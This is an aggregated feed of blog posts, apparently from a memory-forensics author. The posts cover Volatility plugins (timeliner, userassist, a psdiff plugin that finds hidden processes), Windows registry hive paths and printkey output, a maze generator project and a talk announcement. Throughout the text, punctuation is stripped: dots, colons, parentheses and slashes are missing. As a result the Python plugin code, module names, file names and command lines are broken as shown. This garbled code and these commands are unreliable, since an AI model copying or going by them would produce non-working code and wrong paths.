to leave comments and suggestions here or by email Here is the DifferentialEnScript http://www.secuobs.com/revue/news/365570.shtmlhttp://www.secuobs.com/revue/news/365570.shtml Secuobs.com : 2012-03-16 14:59:18 - JL's stuff - I just wanted to take the time to announce the following upcoming talk at John Jay College next week The Center for Cybercrime Studies John Jay College of Criminal Justice Presents Digital Forensic Crime Labs Monique Mattei Ferraro MS, JD, CISSP Technology Forensics, LLC Digital forensics labs throughout the country were set up and subsidized by United States Department of Justice Most labs are administered by police or law enforcement agencies In 2009, the National Academy of Science released Strengthening Forensic Science in the United States A Path Forward, which made several recommendations Among the recommendations were that criminal labs should be independent of police law enforcement in order to retain an appearance of objectivity This talk delves into the tensions between the recommendations and the practice, the ethical implications and current issues affecting digital forensics labs today Date Wednesday, March 21, 2012 Time 1 30 PM Location Haaren Hall, RM 630 899 Tenth Avenue 10th Avenue and 59th Street RSVP Nicole Daniels at 212-237-8920 or email ndaniels jjaycunyedu For additional information please contact Professor Doug Salane, Director of the Center for Cybercrime Studies, 212-237-8836 or email dsalane jjaycunyedu For additional Center for Cybercrime Studies events visit our Web site http wwwjjaycunyedu centers cybercrime_studies indexphp or go to WWWJJAYCUNYEDU, ACADEMICS, RESEARCH CENTERS and INSTITUTES http://www.secuobs.com/revue/news/364072.shtmlhttp://www.secuobs.com/revue/news/364072.shtml Secuobs.com : 2011-09-28 23:25:45 - JL's stuff - Back in July I gave a talk at OMFW about extracting timeline data from a memory sample using the Volatility framework Now has come the time to release the plugins that came along with that talk In addition to the plugins I have included a whitepaper on how these plugins were created and used It is released more in hopes that people will see how to use the framework and be able to write their own plugins or extend existing ones I have included all these plugins in a zip file unzip -l timeliner_9-2011zip Archive timeliner_9-2011zip Length Date Time Name -------- ---- ---- ---- 14455 09-28-11 14 40 volatility plugins timelinerpy 10789 09-27-11 09 24 volatility plugins evtlogspy 147458 09-09-11 11 03 volatility plugins malwarepy 13559 09-22-11 19 09 volatility plugins registryapipy 8554 09-18-11 21 33 volatility plugins getsidspy 40993 09-22-11 16 29 volatility plugins getservicesidspy -------- ------- 235808 6 files evtlogspy plugin to parse Evt logs from XP 2K3 registryapipy plugin for routine registry actions getservicesidspy plugin to collect and calculate service SIDs used with the new getsids and evtlogs timelinerpy the timeline creating script that pulls everything together MHL's malware malware plugins malwarepy are included only for convenience You can also download them from his repository and check there for updates I would like to thank MHL and AW for their valuable feedback and Bertha M for extensive testing of the timeliner plugins The links to the paper and plugins are below Timeliner Release Documentation PDF timeliner plugins ZIP Note Any updates to these plugins will appear in my github repository first http://www.secuobs.com/revue/news/331630.shtmlhttp://www.secuobs.com/revue/news/331630.shtml Secuobs.com : 2011-08-08 21:11:43 - JL's stuff - In case you missed it, Volatility 20 has been released Please download it and test it out and let us know if you have any problems via the issues area of the Google Code project We have lots of documentation and for those on Windows who don't like to install Python, there is a standalone executable available in the downloads section Make sure to check out the FAQ wiki which contains information on what is supported and how to use MHL's malware plugins Some OMFW materials have been released Moyix's slides pdf MHL's Stuxnet blogpost and slides My slides google docs You can help with the development of Volatility by giving us suggestions for plugins, writing documentation or donating malware samples Check out the FAQ for how to do all of the above http://www.secuobs.com/revue/news/321786.shtmlhttp://www.secuobs.com/revue/news/321786.shtml Secuobs.com : 2011-05-01 05:39:38 - JL's stuff - From a computer forensics standpoint, userassist keys can provide a lot of information about user activity see the Harlan's posts for more information After looking at Didier Steven's article on userassist keys for Windows 7 from Into the Boxes issue 0x0 and RegRipper, I decided to write up a plugin that would pull out UserAssist keys from all versions of windows for Volatility One thing I decided to add was an enumeration of GUIDs to human friendly folder names, which were obtained from here The plugin is available in my git repository Simply download and place into your volatility plugins directory and you're set Example Output Below you can see some snippets of output for Windows 7 The fields are pretty self explanatory, though you can read Didier Steven's article for more details The hex dump is the actual data from which this information was parsed, just so you can verify it yourself volpy -f win7vmem --profile Win7SP0x86 userassist --no-cache Volatile Systems Volatility Framework 14_rc1 ---------------------------- Registry C Users admin ntuserdat Key name Count Last updated 2010-07-06 22 40 25 Subkeys Values REG_BINARY MicrosoftWindowsGettingStarted Count 14 Focus Count 21 Time Focused 0 07 00500000 Last updated 2010-03-09 19 49 20 0000 00 00 00 00 0E 00 00 00 15 00 00 00 A0 68 06 00 h 0010 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 0020 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 0030 00 00 80 BF 00 00 80 BF FF FF FF FF EC FE 7B 9C 0040 C1 BF CA 01 00 00 00 00 REG_BINARY UEME_CTLSESSION Count 187 Focus Count 1205 Time Focused 6 25 06216000 Last updated 1970-01-01 00 00 00 0000 00 00 00 00 BB 00 00 00 B5 04 00 00 B4 90 60 01 0010 10 00 00 00 39 00 00 00 E9 67 28 00 7B 00 44 00 9g D 0020 36 00 35 00 32 00 33 00 31 00 42 00 30 00 2D 00 65231B0- 0030 42 00 32 00 46 00 31 00 2D 00 34 00 38 00 35 00 B2F1-485 snip REG_BINARY pourcentswindirpourcents system32 displayswitchexe Count 13 Focus Count 19 Time Focused 0 06 20500000 Last updated 2010-03-09 19 49 20 0000 00 00 00 00 0D 00 00 00 13 00 00 00 60 CC 05 00 0010 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 0020 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 0030 00 00 80 BF 00 00 80 BF FF FF FF FF EC FE 7B 9C 0040 C1 BF CA 01 00 00 00 00 REG_BINARY pourcentswindirpourcents system32 calcexe Count 12 Focus Count 17 Time Focused 0 05 40500000 Last updated 2010-03-09 19 49 20 0000 00 00 00 00 0C 00 00 00 11 00 00 00 20 30 05 00 0 0010 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 0020 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 0030 00 00 80 BF 00 00 80 BF FF FF FF FF EC FE 7B 9C 0040 C1 BF CA 01 00 00 00 00 REG_BINARY Z vmware-share apps odbg110 OLLYDBGEXE Count 11 Focus Count 266 Time Focused 1 19 58045000 Last updated 2010-03-18 01 56 31 0000 00 00 00 00 0B 00 00 00 0A 01 00 00 69 34 49 00 i4I 0010 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 0020 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 0030 00 00 80 BF 00 00 80 BF FF FF FF FF 70 3B CB 3A p 0040 3E C6 CA 01 00 00 00 00 REG_BINARY pourcentsProgramFilespourcents Microsoft SDKs Windows v70 Bin vsstools vshadowexe Count 0 Focus Count 67 Time Focused 0 06 12811000 Last updated 1970-01-01 00 00 00 0000 00 00 00 00 00 00 00 00 43 00 00 00 57 AE 05 00 CW 0010 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 0020 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 0030 00 00 80 BF 00 00 80 BF FF FF FF FF 00 00 00 00 0040 00 00 00 00 00 00 00 00 REG_BINARY pourcentswindirpourcents regeditexe Count 2 Focus Count 8 Time Focused 0 03 22626000 Last updated 2010-03-17 23 40 36 0000 00 00 00 00 02 00 00 00 08 00 00 00 8E 15 03 00 0010 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 0020 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 0030 00 00 80 BF 00 00 80 BF FF FF FF FF 90 3A 93 3E 0040 2B C6 CA 01 00 00 00 00 Here you can see an example of output from Windows XP volpy -f XPSP3vmem --profile WinXPSP3x86 userassist --no-cache Volatile Systems Volatility Framework 14_rc1 ---------------------------- Registry Device HarddiskVolume1 Documents and Settings Administrator NTUSERDAT Key name Count Last updated 2010-11-24 16 35 34 Subkeys Values REG_BINARY UEME_CTLSESSION 0000 91 52 5B 0E 1F 00 00 00 R REG_BINARY UEME_CTLCUACount ctor ID 1 Count 2 Last updated 1970-01-01 00 00 00 0000 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 REG_BINARY UEME_RUNPATH ID 31 Count 589 Last updated 2010-11-24 16 30 49 0000 1F 00 00 00 52 02 00 00 A0 91 09 F4 F4 8B CB 01 R REG_BINARY UEME_RUNPATH D SETUPEXE ID 30 Count 6 Last updated 2010-09-20 15 02 47 0000 1E 00 00 00 0B 00 00 00 E0 85 39 E3 D4 58 CB 01 9X REG_BINARY UEME_RUNPIDL ID 31 Count 124 Last updated 2010-11-24 14 19 29 0000 1F 00 00 00 81 00 00 00 50 78 79 9B E2 8B CB 01 Pxy REG_BINARY UEME_RUNPIDL pourcentscsidl2pourcents Microsoft Visual Basic 60 ID 1 Count 2 Last updated 2009-05-12 02 28 10 0000 01 00 00 00 02 00 00 00 B0 1E DB 4A A9 D2 C9 01 J REG_BINARY UEME_RUNPATH C Program Files Microsoft Visual Studio VB98 VB6EXE ID 1 Count 1 Last updated 2009-05-12 02 28 10 0000 01 00 00 00 06 00 00 00 50 62 FC 4A A9 D2 C9 01 PbJ REG_BINARY UEME_RUNPIDL C Documents and Settings All Users Start Menu Windows Updatelnk ID 1 Count 1 Last updated 2009-05-12 02 28 36 0000 01 00 00 00 06 00 00 00 F0 D0 A1 5A A9 D2 C9 01 Z REG_BINARY UEME_RUNPATH C WINDOWS system32 wupdmgrexe ID 31 Count 2 Last updated 2010-11-24 14 50 05 Shoutz to ikelos for helping me optimize this - References Into the Boxes issue 0x0 http intotheboxeswordpresscom 2010 01 01 into-the-boxes-issue-0x0 RegRipper http regripperwordpresscom http://www.secuobs.com/revue/news/301835.shtmlhttp://www.secuobs.com/revue/news/301835.shtml Secuobs.com : 2011-04-05 21:18:30 - JL's stuff - So if you come to this blog, you've most likely heard of Volatility You're probably also a user maybe you've written some plugins, maybe not Most people tend to fall into the latter category, though they may be be power users Today I thought I'd go over a few things that might make it easier for people to start writing their own plugins for simple useful things, because even though the Volatility 14 isn't officially released doesn't mean that you can't enjoy it in the meantime - A common way that people start their analysis is to look at differences in output of plugins that represent what the OS knows about pslist modules connections sockets etc vs scanning for possible hidden unlinked items Examples of this can be seen in Jesse Kornblum's pstotal, Command Line Kung Fu's Making a Difference and MHL's psxview which actually is very useful If you look at some of these examples, you might think to yourself that it's difficult to write a plugin to get a process difference, but it's really not You can use inheritance to make your life easier PSList vs PSScan2 Below is a complete plugin for printing out the difference between pslist and psscan2, which we will go over in detail 1 import volatilitypluginstaskmods as taskmods 2 import volatilitypluginsmodscan2 as modscan2 3 4 class PSDiff modscan2PSScan2 5 Print processes found in psscan2, but not in pslist 6 7 def __init__ self, config, args 8 modscan2PSScan2__init__ self, config, args 9 10 def calculate self 11 pslist taskmodsPSList self_config calculate 12 pids 13 for task in pslist 14 pidsappend taskUniqueProcessIdv 15 16 psscan modscan2PSScan2calculate self 17 for task in psscan 18 if taskUniqueProcessIdv not in pids 19 yield task First you need to import the plugin files that contain the classes you want to inherit into your plugin file In this case PSList is defined in volatility plugins taskmodspy and PSScan2 is defined in volatility plugins modscan2py You can see the import in lines 1-2 Now you have to define the class for your plugin line 4 Try to give it a meaningful name for what it does, here we will name it PSDiff Classes should be named in CamelCase In the parentheses after the class name we will specify which classes we want to inherit Since we want processes that are only found in psscan2 output, we will use the render_text output function of psscan2 without having to redefine it Therefore, since we want for our new class to be more like psscan2, we choose this class to inherit We specify it as modscan2PSScan2 because we had imported the plugin file as modscan2 and the class for pssscan2 is named PSScan2 Next on line 5, we add a description of what this plugin does as a multiline comment Whatever you type here will appear in the help function when you run python volpy plugin -h, or just python volpy -h Lines 7-8 are the initialization and options section of the plugin We are not adding any command line options to this plugin and are just initializing the PSScan2 class that we inherited Lines 10-19 define the calculate part of our plugin, or what we want the plugin to do In this case we only want to print out processes that are found by psscan2 and not pslist, so should decide how to do that Since processes should have unique process IDs PIDs to specify unique processes So PIDs that are found in psscan2, but not in pslist will be printed Let's walk through the calculate function First we gather all processes that pslist knows about line 11 We call the taskmodsPSList class, give it our configuration self_config so that it can know what profile to use and call its calculate function, which returns eprocess objects and really is just DllList's calculate function, but we'll ignore that for now In line 12, we define an empty list to store PIDs from pslist in order to compare to psscan2's PIDs Lines 13-14 collect all the PIDs pslist knows about Now lines 16-19 repeat the process for psscan2 except that instead of collecting PIDs into a list, we check to see if the PID we've encountered is already in the list of PIDs from pslist If it isn't, then we yield the task that contains that PID so that it will be caught by psscan2's render_text function and output onto the screen The output Here you can see what it looks like on a Windows 7 image python volpy -f win7dd --profile Win7SP0x86 psdiff Volatile Systems Volatility Framework 14_rc1 Offset Name PID PPID PDB Time created Time exited ---------- ---------------- ------ ------ ---------- ------------------------ ------------------------ 0x3eac6030 SearchProtocol 2448 1168 0x3ecf15c0 2010-06-16 23 30 52 2010-06-16 23 33 14 0x3eb10030 SearchFilterHo 1812 1168 0x3ecf1480 2010-06-16 23 31 02 2010-06-16 23 33 14 0x3f0576a0 svchostexe 2836 508 0x3ecf15c0 2010-06-16 17 02 34 2010-06-16 17 08 43 0x3faa66e8 dllhostexe 948 628 0x3ecf1540 2010-06-16 23 32 15 2010-06-16 23 32 21 0x3fbcf920 dllhostexe 3776 628 0x3ecf11e0 2010-06-16 23 32 09 2010-06-16 23 32 15 The only difference in this case seems to be exited processes Here you can see a run on Moyix's ds_fuzz image python volpy -f ds_fuzz_hidden_procimg psdiff Volatile Systems Volatility Framework 14_rc1 Offset Name PID PPID PDB Time created Time exited ---------- ---------------- ------ ------ ---------- ------------------------ ------------------------ 0x0181b748 algexe 992 660 0x08140260 2008-11-15 23 43 25 0x0185dda0 cmdexe 940 1516 0x081401a0 2008-11-26 07 43 39 2008-11-26 07 45 49 0x018af020 taskmgrexe 808 620 0x08140280 2008-11-26 07 45 22 2008-11-26 07 45 40 0x019456e8 csrssexe 592 360 0x08140040 2008-11-15 23 42 56 0x01946020 svchostexe 828 660 0x081400c0 2008-11-15 23 42 57 0x019467e0 servicesexe 660 616 0x08140080 2008-11-15 23 42 56 0x0194f658 svchostexe 1016 660 0x08140100 2008-11-15 23 42 57 0x019533c8 svchostexe 924 660 0x081400e0 2008-11-15 23 42 57 Suppose you are concerned that a PID could have been overwritten somehow DKOM You could rewrite the plugin to use _EPROCESS offsets instead of PIDs for a check 1 import volatilitypluginstaskmods as taskmods 2 import volatilitypluginsmodscan2 as modscan2 3 4 class PSDiff modscan2PSScan2 5 Print processes found in psscan2, but not in pslist 6 7 def __init__ self, config, args 8 modscan2PSScan2__init__ self, config, args 9 10 def calculate self 11 pslist taskmodsDllList self_config calculate 12 offsets 13 for task in pslist 14 offsetsappend taskobj_vmvtop taskobj_offset 15 16 psscan modscan2PSScan2calculate self 17 for task in psscan 18 if taskobj_offset not in offsets 19 yield task The changes are in lines 12, 14 and 18 The idea is the same as our PID plugin above, only with offsets So we rename our list to offsets to make it clearer line 12 We append the physical address of where our _EPROCESS object is found line 14 , this is because scanners like psscan2 only output physical addresses so we want to make sure that the addresses from pslist are the same In line 18 we check to see if our _EPROCESS object offset found by psscan2 is already found by pslist and if not we yield it so that its information will be printed Output is the same as what we saw above for our two test images Conclusion So there you have it You can use the same idea for comparing output from modules and modscan2, connections and connscan2, sockets and sockscan or files and filescan etc I'm leaving this as an exercise for the reader - You can check also out the references below for further reading on Python and Volatility Make sure to read the Volatility Plugin Writers Guide that Mike Auty and Scudette put together References Google Python Class http codegooglecom edu languages google-python-class Python 27 Tutorial http docspythonorg tutorial Volatility Plugin Writers Guide http codegooglecom p volatility wiki PluginWritersGuide http://www.secuobs.com/revue/news/296427.shtmlhttp://www.secuobs.com/revue/news/296427.shtml Secuobs.com : 2011-04-04 20:22:20 - JL's stuff - Since my QC venus website is no longer active, I thought I'd put the files for a maze generator some place where they can be accessed, especially since I have received emails about it Here is the original information that was on venus before it disappeared Maze Generator Using Disjoint Sets I recently went through several files of mine that had been stored away from my undergrad days So I thought I might share them Someone might like them I have not changed any of the code since it was first written I have only changed the formatting of a couple of files to make them easier to read and modified the comment header slightly also for readability Everything is well commented, which was my style at the time - Hopefully I have not erased anything important as I was doing these modifications, but I have no patience to test it at the moment Oh, and I added a GPL for my code only, just in case though no one will really want this -P This particular project is from Prof Stewart Weiss' CS 335 class, and consisted of writing a program that would generate mazes It was compiled under Visual Studio 60 C We had studied Disjoint Sets in our class and were allowed to use code from Mark Allen Weiss' book from which we were studying In addition to printing out to a text file, for extra credit we could output a graphical representation of the maze For this I used code from Owen L Astrachan's book which I think is from CMU Graphics Two example outputs can be seen below Other outputs include for the two unknowns, sorry I forgot what I punched in and have no patience to create more mazes or count cells 5X5txt 25X40txt 40X30txt unknown dimensions 1 unknown dimensions 2 The idea is fairly simple The maze is broken up into cells We will use the idea of disjoint sets in the beginning each cell is in its own set Cells are randomly chosen to remove a wall and one of the four walls is also randomly chosen and as the wall is removed, the cell and its new neighbor are then placed in the same set You keep doing this until all cells are within the first entry cell's set At this point you have a maze You should make sure that once a cell is in the main entry cell's set, it should never be picked again to remove wall You also have to be careful not to remove the outer border walls, thus creating alternate exits - The disjoint sets class was modified from the original given in the book There was a problem with the find function so it was changed Also, I added extra functions to make it fit with the maze class I also created a vector of cells for the maze see Cell class and Maze class below I would have done things differently if I were doing writing this now, but this was in the beginning of my programming experience Here are the disjoint sets files DisjSetsh DisjSetscpp I created a Cell class to represent each cell of the maze This way I could control the walls of the cells and keep track of which walls were still up or down when I printed out the maze Here are the Cell class files Cellh cellcpp Next I wrote a Maze class to keep track of all of the cells At first I thought to implement this using a 2-dimensional array, but ultimately decided to use a linear vector defined in DisjSets folded onto itself There is also a list used to contain all cells of the maze This is not the maze itself, but rather the cells that have not yet been placed into the main set in order to create a maze I did this to cut down on run time because you do not want to remove walls from cells that have already become part of the main set and randomly picking cells most likely leads to picking cells that have already been chosen especially towards the end So keeping a pool of possible choices was the only logical thing to do to cut down on run time Here are the Maze class files mazeh mazecpp Now for the main part of the program At the time I was obsessed with making the main function as small as possible int main string resp while true getMazeInfo coutresp if resp q break end while return 0 Granted it could have been smaller - It basically loops forever creating mazes of whatever size I think 50x60 is the max is requested and stops when the user wants to leave The code is NOT perfect Just glancing over ASSN3Maincpp, I see a buffer overflow error could occur in the getMazeInfo function Plus there were better ways now of dealing with the graphics Yes I COULD fix it, but then I would find other things and before you know it this would explode into a full time projectOk Maybe I'm exaggerating Perhaps some day when I have more time I will rewrite this little application It's kinda fun to create mazes The main code ASSN3Maincpp I am releasing all of the code in gzip files as well as a precompiled executable You can use 7zip to open the files If you use the executable, you will see a message box saying something about how this was compiled with the student version and can't be used as commercial software or some such Just push Ok and you're set After you input the dimensions and the name of the output file to which you would like the maze saved, a graphical window will pop up Click it with the mouse and the maze should display You have to push ESC to get out of the graphical maze window maze-allcodetgz maze-exetgz Hopefully I have managed to include all of the code that is needed Let me know if something is missing http://www.secuobs.com/revue/news/296140.shtmlhttp://www.secuobs.com/revue/news/296140.shtml Secuobs.com : 2011-04-04 01:16:18 - JL's stuff - A little while ago I helped get the registry stuff working on images other than XP for Volatility 14 There are some differences in how the paths names of the hives are stored, that I thought I might go over here In XP we have the following structure for a registry hive '_CMHIVE' 0x49c, 'Hive' 0x0, '_HHIVE' , 'FileHandles' 0x210, 'array', 3, 'pointer', 'void' , 'NotifyList' 0x21c, '_LIST_ENTRY' , 'HiveList' 0x224, '_LIST_ENTRY' , 'HiveLock' 0x22c, 'pointer', '_FAST_MUTEX' , 'ViewLock' 0x230, 'pointer', '_FAST_MUTEX' , 'LRUViewListHead' 0x234, '_LIST_ENTRY' , 'PinViewListHead' 0x23c, '_LIST_ENTRY' , 'FileObject' 0x244, 'pointer', '_FILE_OBJECT' , 'FileFullPath' 0x248, '_UNICODE_STRING' , 'FileUserName' 0x250, '_UNICODE_STRING' , 'MappedViews' 0x258, 'unsigned short' , 'PinnedViews' 0x25a, 'unsigned short' , 'UseCount' 0x25c, 'unsigned long' , 'SecurityCount' 0x260, 'unsigned long' , 'SecurityCacheSize' 0x264, 'unsigned long' , 'SecurityHitHint' 0x268, 'long' , 'SecurityCache' 0x26c, 'pointer', '_CM_KEY_SECURITY_CACHE_ENTRY' , 'SecurityHash' 0x270, 'array', 64, '_LIST_ENTRY' , 'UnloadEvent' 0x470, 'pointer', '_KEVENT' , 'RootKcb' 0x474, 'pointer', '_CM_KEY_CONTROL_BLOCK' , 'Frozen' 0x478, 'unsigned char' , 'UnloadWorkItem' 0x47c, 'pointer', '_WORK_QUEUE_ITEM' , 'GrowOnlyMode' 0x480, 'unsigned char' , 'GrowOffset' 0x484, 'unsigned long' , 'KcbConvertListHead' 0x488, '_LIST_ENTRY' , 'KnodeConvertListHead' 0x490, '_LIST_ENTRY' , 'CellRemapArray' 0x498, 'pointer', '_CM_CELL_REMAP_BLOCK' , , When running a hivelist command from Volatility on an XP or Windows 2003 image, the name of the hive is obtained from the FileFullPath entry above This is more of a generic name prefixed with Device HarddiskVolume1 There is also a FileUserName entry in _CMHIVE, which may contain the actual path to the hive on disk Here are a few examples FileFullPath Device HarddiskVolume1 WINDOWS system32 config SECURITY FileUserName SystemRoot System32 Config SECURITY FileFullPath Device HarddiskVolume1 WINDOWS system32 config software FileUserName SystemRoot System32 Config SOFTWARE FileFullPath Device HarddiskVolume1 Documents and Settings NetworkService NTUSERDAT FileUserName C Documents and Settings NetworkService ntuserdat As I said, we get the same results for Windows 2003 Starting with Windows Vista, we have an extra member in _CMHIVE, named HiveRootPath which contains another registry name starting either with REGISTRY MACHINE or REGISTRY USER Here we can see output from a modified hivelist plugin, each hive is separated by asterisks FileFullPath FileUserName HiveRootPath REGISTRY MACHINE HARDWARE FileFullPath Device HarddiskVolume1 Windows System32 SMI Store Machine SCHEMADAT FileUserName C Windows System32 SMI Store Machine SCHEMADAT HiveRootPath registry machine Schema FileFullPath Device HarddiskVolume1 Windows System32 config SOFTWARE FileUserName SystemRoot System32 Config SOFTWARE HiveRootPath REGISTRY MACHINE SOFTWARE FileFullPath Device HarddiskVolume1 Windows System32 config DEFAULT FileUserName SystemRoot System32 Config DEFAULT HiveRootPath REGISTRY USER DEFAULT FileFullPath Device HarddiskVolume1 Windows System32 config SAM FileUserName SystemRoot System32 Config SAM HiveRootPath REGISTRY MACHINE SAM FileFullPath Device HarddiskVolume1 Windows System32 config SECURITY FileUserName SystemRoot System32 Config SECURITY HiveRootPath REGISTRY MACHINE SECURITY FileFullPath Device HarddiskVolume1 Windows System32 config COMPONENTS FileUserName SystemRoot System32 Config COMPONENTS HiveRootPath REGISTRY MACHINE COMPONENTS FileFullPath Device HarddiskVolume1 Boot BCD FileUserName Device HarddiskVolume1 Boot BCD HiveRootPath REGISTRY MACHINE BCD00000000 FileFullPath Device HarddiskVolume1 Windows ServiceProfiles NetworkService NTUSERDAT FileUserName HiveRootPath REGISTRY USER S-1-5-20 FileFullPath Device HarddiskVolume1 Windows ServiceProfiles LocalService NTUSERDAT FileUserName C Windows ServiceProfiles LocalService ntuserdat HiveRootPath REGISTRY USER S-1-5-19 FileFullPath Device HarddiskVolume1 Users user NTUSERDAT FileUserName C Users user ntuserdat HiveRootPath Registry User S-1-5-21-3861645159-1226237480-2911178601-1000 FileFullPath Device HarddiskVolume1 Users user AppData Local Microsoft Windows UsrClassdat FileUserName C Users user AppData Local Microsoft Windows UsrClassdat HiveRootPath Registry User S-1-5-21-3861645159-1226237480-2911178601-1000_Classes FileFullPath FileUserName HiveRootPath REGISTRY MACHINE SYSTEM You can see that there are a couple of registries that only have HiveRootPath populated REGISTRY MACHINE SYSTEM and REGISTRY MACHINE HARDWARE REGISTRY MACHINE HARDWARE is a volatile hive that contains hardware information populated during bootup 1 , we will explore this key a bit later We get the same output for all service packs of Vista as well as Windows 2008 which is closely related to Vista SP1 2 For Windows 7 we get slightly different results Even though FileFullPath is defined in _CMHIVE for Windows 7, it does not appear to be used at all FileFullPath FileUserName SystemRoot System32 Config SECURITY HiveRootPath REGISTRY MACHINE SECURITY FileFullPath FileUserName C System Volume Information Syscachehve HiveRootPath REGISTRY A 43bcec53-795b-11df-9d3d-000c29bf81c3 FileFullPath FileUserName HiveRootPath REGISTRY MACHINE SYSTEM FileFullPath FileUserName HiveRootPath REGISTRY MACHINE HARDWARE FileFullPath FileUserName SystemRoot System32 Config DEFAULT HiveRootPath REGISTRY USER DEFAULT FileFullPath FileUserName HiveRootPath REGISTRY USER S-1-5-20 FileFullPath FileUserName C Windows ServiceProfiles LocalService NTUSERDAT HiveRootPath REGISTRY USER S-1-5-19 FileFullPath FileUserName Device HarddiskVolume1 Boot BCD HiveRootPath REGISTRY MACHINE BCD00000000 FileFullPath FileUserName SystemRoot System32 Config SOFTWARE HiveRootPath REGISTRY MACHINE SOFTWARE FileFullPath FileUserName C Users user ntuserdat HiveRootPath Registry User S-1-5-21-1665533257-296859758-874228692-1000 FileFullPath FileUserName C Users user AppData Local Microsoft Windows UsrClassdat HiveRootPath Registry User S-1-5-21-1665533257-296859758-874228692-1000_Classes FileFullPath FileUserName SystemRoot System32 Config SAM HiveRootPath REGISTRY MACHINE SAM Therefore in Windows 7 output of hivelist, you will see FileUserName paths when they are defined or HiveRootPath paths if they are not Virtual Physical Name 0x963e39d0 0x1d41a9d0 SystemRoot System32 Config SECURITY 0xa057a7a8 0x3518e7a8 C System Volume Information Syscachehve 0x82ba6140 0x02ba6140 no name 0x87a0c008 0x28027008 no name 0x87a1c008 0x27fb5008 REGISTRY MACHINE SYSTEM 0x87a429d0 0x27f9d9d0 REGISTRY MACHINE HARDWARE 0x87abc898 0x1fd97898 SystemRoot System32 Config DEFAULT 0x8849e008 0x27dc0008 REGISTRY USER S-1-5-20 0x88521008 0x1be07008 C Windows ServiceProfiles LocalService NTUSERDAT 0x8bb309d0 0x25bac9d0 Device HarddiskVolume1 Boot BCD 0x8bb328d8 0x25bb58d8 SystemRoot System32 Config SOFTWARE 0x91a9a9d0 0x1787c9d0 C Users user ntuserdat 0x91f2d9d0 0x13b949d0 C Users user AppData Local Microsoft Windows UsrClassdat 0x963bf008 0x1fa36008 SystemRoot System32 Config SAM Getting Registry Paths from the SYSTEM Registry You can also obtain a list of registry files were loaded by the system by checking the SYSTEM CurrentControlSet Control Hivelist key 1 python volpy -f VistaSP2x86dmp --profile VistaSP2x86 printkey -K 'controlset001 control hivelist' Volatile Systems Volatility Framework 14_rc1 Legend S Stable V Volatile ---------------------------- Registry REGISTRY MACHINE SYSTEM Key name hivelist V Last updated 2010-11-30 18 05 20 Subkeys Values REG_SZ REGISTRY MACHINE HARDWARE V REG_SZ REGISTRY MACHINE SECURITY V Device HarddiskVolume1 Windows System32 config SECURITY REG_SZ REGISTRY MACHINE SOFTWARE V Device HarddiskVolume1 Windows System32 config SOFTWARE REG_SZ REGISTRY MACHINE SYSTEM V Device HarddiskVolume1 Windows System32 config SYSTEM REG_SZ REGISTRY USER DEFAULT V Device HarddiskVolume1 Windows System32 config DEFAULT REG_SZ REGISTRY MACHINE SAM V Device HarddiskVolume1 Windows System32 config SAM REG_SZ REGISTRY MACHINE COMPONENTS V Device HarddiskVolume1 Windows System32 config COMPONENTS REG_SZ REGISTRY MACHINE BCD00000000 V Device HarddiskVolume1 Boot BCD REG_SZ REGISTRY USER S-1-5-20 V Device HarddiskVolume1 Windows ServiceProfiles NetworkService NTUSERDAT REG_SZ REGISTRY USER S-1-5-19 V Device HarddiskVolume1 Windows ServiceProfiles LocalService NTUSERDAT REG_SZ registry machine Schema V Device HarddiskVolume1 Windows System32 SMI Store Machine SCHEMADAT REG_SZ Registry User S-1-5-21-3861645159-1226237480-2911178601-1000 V Device HarddiskVolume1 Users user NTUSERDAT REG_SZ Registry User S-1-5-21-3861645159-1226237480-2911178601-1000_Classes V Device HarddiskVolume1 Users user AppData Local Microsoft Windows UsrClassdat References 1 Mark Russinovich, David Solomon and Alex Ionescu Windows Internals 5th Edition 2 Moyix, Enumerating Registry Hives http://www.secuobs.com/revue/news/295956.shtmlhttp://www.secuobs.com/revue/news/295956.shtml Secuobs.com : 2011-03-30 15:30:28 - JL's stuff - You don't have to use the printkey plugin I released to get bruteforce action It has been incorporated into the Volatility SVN thanks to Mike Auty - So by default you don't have to issue an offset anymore python volpy -f ds_fuzz_hidden_procimg printkey -K 'ControlSet001 Control ComputerName ComputerName' Volatile Systems Volatility Framework 14_rc1 Legend S Stable V Volatile ---------------------------- Registry Device HarddiskVolume1 WINDOWS system32 config system Key name ComputerName S Last updated 2008-10-21 17 48 29 Subkeys Values REG_SZ ComputerName S GINEVRA And keys from multiple hives will also appear with a separator python volpy -f ds_fuzz_hidden_procimg printkey -K 'Software Microsoft Windows NT CurrentVersion Winlogon' Volatile Systems Volatility Framework 14_rc1 Legend S Stable V Volatile ---------------------------- Registry Device HarddiskVolume1 Documents and Settings NetworkService NTUSERDAT Key name Winlogon S Last updated 2008-11-26 07 38 23 Subkeys Values REG_SZ ParseAutoexec S 1 REG_SZ ExcludeProfileDirs S Local Settings Temporary Internet Files History Temp REG_DWORD BuildNumber S 2600 ---------------------------- Registry Device HarddiskVolume1 WINDOWS system32 config default Key name Winlogon S Last updated 2008-11-26 07 39 40 Subkeys Values REG_SZ ParseAutoexec S 1 REG_SZ ExcludeProfileDirs S Local Settings Temporary Internet Files History Temp REG_DWORD BuildNumber S 2600 ---------------------------- Registry Device HarddiskVolume1 Documents and Settings LocalService NTUSERDAT Key name Winlogon S Last updated 2008-11-26 07 38 53 Subkeys Values REG_SZ ParseAutoexec S 1 REG_SZ ExcludeProfileDirs S Local Settings Temporary Internet Files History Temp REG_DWORD BuildNumber S 2600 ---------------------------- Registry Device HarddiskVolume1 Documents and Settings moyix NTUSERDAT Key name Winlogon S Last updated 2008-09-19 20 29 52 Subkeys Values REG_SZ ParseAutoexec S 1 REG_SZ ExcludeProfileDirs S Local Settings Temporary Internet Files History Temp REG_DWORD BuildNumber S 2600 